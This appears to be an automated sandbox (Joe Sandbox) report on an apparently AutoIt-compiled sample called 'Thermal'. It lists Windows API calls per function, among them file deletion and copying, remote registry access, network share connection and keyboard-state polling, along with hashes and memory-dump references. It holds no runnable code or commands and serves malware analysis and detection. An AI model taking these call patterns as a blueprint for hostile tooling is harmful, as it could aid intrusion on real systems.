                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 311963372-2391861430
                                                • Opcode ID: 193de307fc56027e5d0d0f38c9629974c0b9f69647c8a2d7790f4e93290812ee
                                                • Instruction ID: 238d89e686884dbe5f7623b202c3c9c64949fb6d82d6af2372ad7a300017252c
                                                • Opcode Fuzzy Hash: 193de307fc56027e5d0d0f38c9629974c0b9f69647c8a2d7790f4e93290812ee
                                                • Instruction Fuzzy Hash: 44519B71840219FACF14FBA0DD4AEEEB779BF04340F500166F505A22A2EB396F59CB61
                                                APIs
                                                  • Part of subcall function 007D951A: __time64.LIBCMT ref: 007D9524
                                                  • Part of subcall function 00784A8C: _fseek.LIBCMT ref: 00784AA4
                                                • __wsplitpath.LIBCMT ref: 007D97EF
                                                  • Part of subcall function 0079431E: __wsplitpath_helper.LIBCMT ref: 0079435E
                                                • _wcscpy.LIBCMT ref: 007D9802
                                                • _wcscat.LIBCMT ref: 007D9815
                                                • __wsplitpath.LIBCMT ref: 007D983A
                                                • _wcscat.LIBCMT ref: 007D9850
                                                • _wcscat.LIBCMT ref: 007D9863
                                                  • Part of subcall function 007D9560: _memmove.LIBCMT ref: 007D9599
                                                  • Part of subcall function 007D9560: _memmove.LIBCMT ref: 007D95A8
                                                • _wcscmp.LIBCMT ref: 007D97AA
                                                  • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DE1
                                                  • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DF4
                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D9A0D
                                                • _wcsncpy.LIBCMT ref: 007D9A80
                                                • DeleteFileW.KERNEL32(?,?), ref: 007D9AB6
                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D9ACC
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9ADD
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9AEF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 1500180987-0
                                                • Opcode ID: 3f501fcbbb792406124c37b0b271a50d1a3721f66a4181f96e7055dcf3e68cc5
                                                • Instruction ID: 78306b6728a083c2d271600e92d9d57958030c157306b351603090abb624f420
                                                • Opcode Fuzzy Hash: 3f501fcbbb792406124c37b0b271a50d1a3721f66a4181f96e7055dcf3e68cc5
                                                • Instruction Fuzzy Hash: 2EC13CB1900219AADF15DFA5CC89EDEB7BDEF44300F0040ABF609E6251EB749A848F65
                                                APIs
                                                • _memset.LIBCMT ref: 00785BF1
                                                • GetMenuItemCount.USER32(00837890), ref: 007C0E7B
                                                • GetMenuItemCount.USER32(00837890), ref: 007C0F2B
                                                • GetCursorPos.USER32(?), ref: 007C0F6F
                                                • SetForegroundWindow.USER32(00000000), ref: 007C0F78
                                                • TrackPopupMenuEx.USER32(00837890,00000000,?,00000000,00000000,00000000), ref: 007C0F8B
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C0F97
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID:
                                                • API String ID: 2751501086-0
                                                • Opcode ID: a73351433eab698bb40ce2e311656c30955ed40de6cea7baa2c65962a5c3e88e
                                                • Instruction ID: 56ed2ec339b2bf5c5423f0e6caa5f2a319abc62125fa231d4428731edf65963b
                                                • Opcode Fuzzy Hash: a73351433eab698bb40ce2e311656c30955ed40de6cea7baa2c65962a5c3e88e
                                                • Instruction Fuzzy Hash: 7C71C070684619FEEB20AB54DC89FAABF64FF04764F10021AF524A61D1C7B96860DFE0
                                                APIs
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • _memset.LIBCMT ref: 007C8489
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007C84BE
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007C84DA
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007C84F6
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007C8520
                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007C8548
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C8553
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C8558
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 1411258926-22481851
                                                • Opcode ID: 9c949117aaca817c36975284a6239355faf55dfdf05670b160dae50f4fbada3d
                                                • Instruction ID: e2434bca671cb4799cd6d762fc763099d4652b140936a7a6cda077dc99bd8071
                                                • Opcode Fuzzy Hash: 9c949117aaca817c36975284a6239355faf55dfdf05670b160dae50f4fbada3d
                                                • Instruction Fuzzy Hash: 3E410872C5022DEBCF15EBA4EC99EEDB778FF04350F404169E815A2261EB385E05CB90
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 3964851224-909552448
                                                • Opcode ID: 5cd73889340b5fb4cde9c877915ea369c93ef823c12a26150ee9abecf4892f88
                                                • Instruction ID: 979b01e3bbd853ef8f58cb239cc7fede9774296427fadf3a3ae9b0249ad4a577
                                                • Opcode Fuzzy Hash: 5cd73889340b5fb4cde9c877915ea369c93ef823c12a26150ee9abecf4892f88
                                                • Instruction Fuzzy Hash: FA41F97065026ECBDF04EFA0E855AFA3724FF51300FA04455EE5297252DB38AD69CBA1
                                                APIs
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                  • Part of subcall function 0078153B: _memmove.LIBCMT ref: 007815C4
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007D58EB
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007D5901
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007D5912
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007D5924
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007D5935
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2279737902-1007645807
                                                • Opcode ID: b2fb4a14913c8d05e820c16f6d5d7a36d89d8baf768ef3bb87c1118271cc6555
                                                • Instruction ID: 199096a11fbfa0c8046d5fce243e909092b75bc7d0437cde58ce0d51898af253
                                                • Opcode Fuzzy Hash: b2fb4a14913c8d05e820c16f6d5d7a36d89d8baf768ef3bb87c1118271cc6555
                                                • Instruction Fuzzy Hash: 41119331591169F9D720F7A1DC5EDBF6BBCFB91B50F80042AB411E22D0DE682945C6A0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: 2031342ca56a4535c2121fd5550b2a6af8bf88f64f203cb020c07c202fb8c57d
                                                • Instruction ID: d037bdbe5b2916617e26b738a6da49efab2da7622937cb65ef62a6583586543b
                                                • Opcode Fuzzy Hash: 2031342ca56a4535c2121fd5550b2a6af8bf88f64f203cb020c07c202fb8c57d
                                                • Instruction Fuzzy Hash: 2E11D231515118BFCB61B764EC4AEEA77BCEF41710F0441A6F04896292EF7999828AA1
                                                APIs
                                                • timeGetTime.WINMM ref: 007D5535
                                                  • Part of subcall function 0079083E: timeGetTime.WINMM(?,00000002,0077C22C), ref: 00790842
                                                • Sleep.KERNEL32(0000000A), ref: 007D5561
                                                • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 007D5585
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007D55A7
                                                • SetActiveWindow.USER32 ref: 007D55C6
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007D55D4
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 007D55F3
                                                • Sleep.KERNEL32(000000FA), ref: 007D55FE
                                                • IsWindow.USER32 ref: 007D560A
                                                • EndDialog.USER32(00000000), ref: 007D561B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: a769bd47f51fc4f8cd060473eed1b3804bed9e1fe124db33afab471ee80e3e11
                                                • Instruction ID: 9df8a2cf550a86b709a2890e79b1573c751618536e09c901497353c495bd1555
                                                • Opcode Fuzzy Hash: a769bd47f51fc4f8cd060473eed1b3804bed9e1fe124db33afab471ee80e3e11
                                                • Instruction Fuzzy Hash: 312184B0204704EFEB915B60EC89B263B7BFB95746F441816F502822A1DF799E50DF62
                                                APIs
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • CoInitialize.OLE32(00000000), ref: 007DDC2D
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007DDCC0
                                                • SHGetDesktopFolder.SHELL32(?), ref: 007DDCD4
                                                • CoCreateInstance.OLE32(00803D4C,00000000,00000001,0082B86C,?), ref: 007DDD20
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007DDD8F
                                                • CoTaskMemFree.OLE32(?,?), ref: 007DDDE7
                                                • _memset.LIBCMT ref: 007DDE24
                                                • SHBrowseForFolderW.SHELL32(?), ref: 007DDE60
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007DDE83
                                                • CoTaskMemFree.OLE32(00000000), ref: 007DDE8A
                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007DDEC1
                                                • CoUninitialize.OLE32(00000001,00000000), ref: 007DDEC3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                • String ID:
                                                • API String ID: 1246142700-0
                                                • Opcode ID: 1e03420bce8cc9be788509e38adc0abcf3021b267cb6a5f5faee0d49833aa831
                                                • Instruction ID: 49cd3762ea4149259616fccc2272225ff25d36bee8794018c8fc608ffbf565f4
                                                • Opcode Fuzzy Hash: 1e03420bce8cc9be788509e38adc0abcf3021b267cb6a5f5faee0d49833aa831
                                                • Instruction Fuzzy Hash: C7B1C775A00109EFDB14DFA4C888EAEBBB9FF48314F148469E909EB351DB34AD45CB54
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 007D0896
                                                • SetKeyboardState.USER32(?), ref: 007D0901
                                                • GetAsyncKeyState.USER32(000000A0), ref: 007D0921
                                                • GetKeyState.USER32(000000A0), ref: 007D0938
                                                • GetAsyncKeyState.USER32(000000A1), ref: 007D0967
                                                • GetKeyState.USER32(000000A1), ref: 007D0978
                                                • GetAsyncKeyState.USER32(00000011), ref: 007D09A4
                                                • GetKeyState.USER32(00000011), ref: 007D09B2
                                                • GetAsyncKeyState.USER32(00000012), ref: 007D09DB
                                                • GetKeyState.USER32(00000012), ref: 007D09E9
                                                • GetAsyncKeyState.USER32(0000005B), ref: 007D0A12
                                                • GetKeyState.USER32(0000005B), ref: 007D0A20
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 0e32e645fbb90001c8f416b8b5b6aa2d285df91c2def130f6cee441d63c5e647
                                                • Instruction ID: e40590f2e9bd40b04ea3b35c56862b79f26d2e2ff8878de1697e4544c2fadf44
                                                • Opcode Fuzzy Hash: 0e32e645fbb90001c8f416b8b5b6aa2d285df91c2def130f6cee441d63c5e647
                                                • Instruction Fuzzy Hash: 4051CB3090478469FB35D7B048147AABFB49F01380F48959FD5C6577C3DA68AA8CCBE1
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 007CCE1C
                                                • GetWindowRect.USER32(00000000,?), ref: 007CCE2E
                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007CCE8C
                                                • GetDlgItem.USER32(?,00000002), ref: 007CCE97
                                                • GetWindowRect.USER32(00000000,?), ref: 007CCEA9
                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007CCEFD
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CCF0B
                                                • GetWindowRect.USER32(00000000,?), ref: 007CCF1C
                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007CCF5F
                                                • GetDlgItem.USER32(?,000003EA), ref: 007CCF6D
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007CCF8A
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007CCF97
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 544b0ecd125e145de27c6c4376d1210267d2f42279131c8b3923043b93752c2f
                                                • Instruction ID: c789bbd7df7d09159d49412f1e03f432bb98967368d77dc36331bb292d410870
                                                • Opcode Fuzzy Hash: 544b0ecd125e145de27c6c4376d1210267d2f42279131c8b3923043b93752c2f
                                                • Instruction Fuzzy Hash: FB513F71B00205AFDB18CFA8CD85FAEBBBAFB88711F14812DF519D7290DB75A9008B50
                                                APIs
                                                  • Part of subcall function 00771F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772412,?,00000000,?,?,?,?,00771AA7,00000000,?), ref: 00771F76
                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007724AF
                                                • KillTimer.USER32(-00000001,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 0077254A
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 007ABFE7
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC018
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC02F
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC04B
                                                • DeleteObject.GDI32(00000000), ref: 007AC05D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                • Opcode ID: 378a9ec5dc7e248041b62daf2dfbd3b6979fd578f7b4ddbb1c4517f688cd6ecd
                                                • Instruction ID: 128e88de6ccbec1a2ebe13946333b59604eaeff8a5236439630daa0b88c213c1
                                                • Opcode Fuzzy Hash: 378a9ec5dc7e248041b62daf2dfbd3b6979fd578f7b4ddbb1c4517f688cd6ecd
                                                • Instruction Fuzzy Hash: A6619B31114640EFDB369F14CD48B2AB7F1FB81352F10CA28E06A56A61C779EC92DF94
                                                APIs
                                                  • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                • GetSysColor.USER32(0000000F), ref: 007725AF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: 286c158575d676603352d1b91788e2ab34b930fcdf09a5348d6a2066ab0bb5b7
                                                • Instruction ID: 9600fdb91f2e8d51f28b24716e9ea46a2ea3625ffe7cfef4e0dcc24445fb98c9
                                                • Opcode Fuzzy Hash: 286c158575d676603352d1b91788e2ab34b930fcdf09a5348d6a2066ab0bb5b7
                                                • Instruction Fuzzy Hash: 3D41A131104144AFDF215F289C88BB93765FB4A371F188362FE798A1E6D7388C42DB61
                                                APIs
                                                  • Part of subcall function 00790B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00782A3E,?,00008000), ref: 00790BA7
                                                  • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00782ADF
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00782C2C
                                                  • Part of subcall function 00783EBE: _wcscpy.LIBCMT ref: 00783EF6
                                                  • Part of subcall function 0079386D: _iswctype.LIBCMT ref: 00793875
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 537147316-3738523708
                                                • Opcode ID: ecb7dfd1dfaff032b9bd2cf80dea8b4ab73795a3c5c082f8bc0a4dedac213d31
                                                • Instruction ID: d9a1f53f19d04cbd18faa53f431aeb3d42ae85bd408e226fa04147347b04146a
                                                • Opcode Fuzzy Hash: ecb7dfd1dfaff032b9bd2cf80dea8b4ab73795a3c5c082f8bc0a4dedac213d31
                                                • Instruction Fuzzy Hash: 6702AC30148341DFC724EF24C895AAFBBE5BF89710F10491DF49A932A2DB38DA49CB52
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,00800980), ref: 007DAF4E
                                                • GetDriveTypeW.KERNEL32(00000061,0082B5F0,00000061), ref: 007DB018
                                                • _wcscpy.LIBCMT ref: 007DB042
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy
